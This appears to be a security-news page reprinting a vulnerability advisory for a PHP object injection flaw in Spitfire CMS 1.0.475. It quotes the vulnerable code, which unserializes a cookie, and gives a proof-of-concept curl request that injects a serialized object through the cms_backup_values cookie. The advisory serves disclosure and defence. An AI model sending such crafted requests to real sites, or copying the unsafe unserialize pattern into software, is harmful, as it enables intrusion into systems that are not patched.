Security
Headlines
HeadlinesLatestCVEs

Headline

Spitfire CMS 1.0.475 PHP Object Injection

Spitfire CMS version 1.0.475 is prone to a PHP object injection vulnerability due to the unsafe use of unserialize() function. A potential attacker, authenticated, could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input.

Packet Storm
#vulnerability#web#php#nginx#auth
Spitfire CMS 1.0.475 (cms_backup_values) PHP Object InjectionVendor: Claus MuusProduct web page: http://spitfire.clausmuus.deAffected version: 1.0.475Summary: Spitfire is a system to manage the content of webpages.Desc: The application is prone to a PHP Object Injection vulnerabilitydue to the unsafe use of unserialize() function. A potential attacker,authenticated, could exploit this vulnerability by sending speciallycrafted requests to the web application containing malicious serializedinput.-----------------------------------------------------------------------cms/edit/tpl_backup.inc.php:----------------------------47:  private function status ()48:  {49:      $status = array ();50:51:      $status['values'] = array ();52:      $status['values'] = isset ($_COOKIE['cms_backup_values']) ? unserialize ($_COOKIE['cms_backup_values']) : array ();......77:  public function save ($values)78:  {79:      $values = array_merge ($this->status['values'], $values);80:      setcookie ('cms_backup_values', serialize ($values), time()+60*60*24*30);81:  }-----------------------------------------------------------------------Tested on: nginxVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5720Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5720.php28.09.2022--> curl -isk -XPOST http://10.0.0.2/cms/edit/tpl_backup_action.php \       -H 'Content-Type: application/x-www-form-urlencoded'       -H 'Accept: */*'       -H 'Referer: http://10.0.0.2/cms/edit/cont_index.php?tpl=backup'       -H 'Accept-Encoding: gzip, deflate'       -H 'Accept-Language: en-US,en;q=0.9'       -H 'Connection: close' \       -H 'Cookie: tip=0; cms_backup_values=O%3a3%3a%22ZSL%22%3a0%3a%7b%7d; cms_username=admin; PHPSESSID=0e63d3a8762f4bff95050d1146db8c1c' \       --data 'action=save&&value=1'      #--data 'action=save&&value[files]={}'

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution